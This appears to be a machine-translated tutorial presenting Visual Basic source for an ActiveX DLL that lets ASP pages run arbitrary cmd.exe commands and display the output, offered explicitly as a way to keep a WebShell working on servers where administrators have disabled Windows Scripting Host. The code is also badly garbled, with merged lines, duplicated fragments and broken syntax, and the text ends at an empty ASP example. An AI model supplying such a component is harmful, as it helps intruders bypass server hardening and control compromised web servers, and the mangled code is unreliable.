Sometimes we disable Windows Scripting Host when you manage the server, which prevents some of the unscrupulous users from generating a WebShell with WSH, causing a lot of security hazards for the server. But if we want to ban WSH, what should I do with my WebShell for the management of the server? Here is a component programming that implements the CMD in ASP and displays the results. I hope to help everyone.
First we create an ActiveDLL project, named aspcmd, and the new class named cmdshell. Add a reference to "Referenct" in "Project": Microsoft Active Server Pages Object Library.
Then our idea is to call cmd.exe using the Window API Shellexecute, saving the result of the run to a temporary text file, and then read the contents of this file display.
The following is the code of the class cmdshell.cls of the project aspcmd.
Option ExplicitDim rp As ResponseDim rq As RequestDim ap As ApplicationDim sr As ServerDim sn As SessionPrivate Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, BYVAL LPFILE AS STRING, BYVAL LPPARETERS AS STRING, BYVAL LPDIRECTORY AS STRING, BYVAL NSHOWCMD As Long AS Long
Private Sub ShellEx (ByVal sLocation As String, ByVal sPara As String, Optional MaxedForm As Boolean = False) On Error GoTo errhandle: Dim lR As Long Dim Style As Long Dim hWnd As Long If MaxedForm Then Style = vbMaximizedFocus Else Style = vbNormalFocus End If LR = SHELLEXECUTE (HWND, "Open", Slocation, Spara, "" "", "" "," Error Occered When Starting the Program "Error Occered When Starting The Program" Error Occered When Starting The Program "& slocation End Iferrhandle : Rp.write "error:" & Err.DescriptionEND SUB
Public Sub onStartPage (Byval MySC As ScriptingContext) SET RP = mysc.response set rq = mysc.request set sr = mysc.server set ap = mysc.Application set sn = mysc.ssionend SUB
Public Sub OnEndPage () Set rp = Nothing Set rq = Nothing Set sr = Nothing Set ap = Nothing Set sn = NothingEnd SubPrivate Function FileExists (Filename As String) As Boolean Dim i As IntegerOn Error Resume Nexti = Len (Dir $ (Filename) ) If Err Or i = 0 Then FileExists = False Else FileExists = TrueEnd FunctionPrivate Function IsOpen (Filename As String) As Boolean Dim fFile As Integer Dim msg As String fFile = FreeFile () On Error GoTo ErrOpen Open Filename For Binary Lock Read Write As FFile Close FFile Exit FunctionerRopen: if Err.Number <> 70 Then Msg = "Error #" & Str (Err.Number) & "Was generated by" _ & Err.Source & chr (13) & err.description else isopen = True end ifend function
Public Sub Exec1 (ByVal strCmd As String) On Error GoTo errhandle: Dim myTimer As Integer myTimer = 0 Dim strOut As String Dim strFname As String // generates a temporary file If Len (App.Path) = 3 Then strFname = App.Path & "lhtmp.txt" else strfName = app.path & "/tmp.txt" end if // If the file exists before the file already exists, IF FileExists (StrfName) THEN KILL STRFNAME END IFSTER THEN KILL STRFNAME END IFUS Command, and output the result to the temporary file // Note that cmd.exe's / c parameter refers to the end of the session immediately after running a command. The CMD command is equivalent to entering the RUN of Windows. DIM STRPARA AS STRING STRPARA = "/ C" & strcmd & "& strfName Shellex" cmd.exe ", strpara // Wait to generate output file do while not fileexists (strfName) Sleep 1000 doevents mytimer = myTimer 1 if myTimer = 15 THEN EXIT Do End if loop myTimer = 0 // Waiting for the file output DO while isopen (strfname) Sleep 1000 doevents mytimer = mytimer 1 ifmy = 15 THEN EXIT Do End if loop // Display Out StrfName for Input as # 1 do while not eof (1) Line Input # 1, strout rp.write strout & vbcrf loop close # 1 sleep 1000 // Delete Temporary files Kill strfName Exit SuberRhandle: rp.write "Error Occured:" & ERR. DescriptionEND SUB generates aspcmd.dll, use the Regsvr32 aspcmd.dll registration component.
The following is an ASP program example of calling the DLL:
<% @ Language = "VBScript"%>
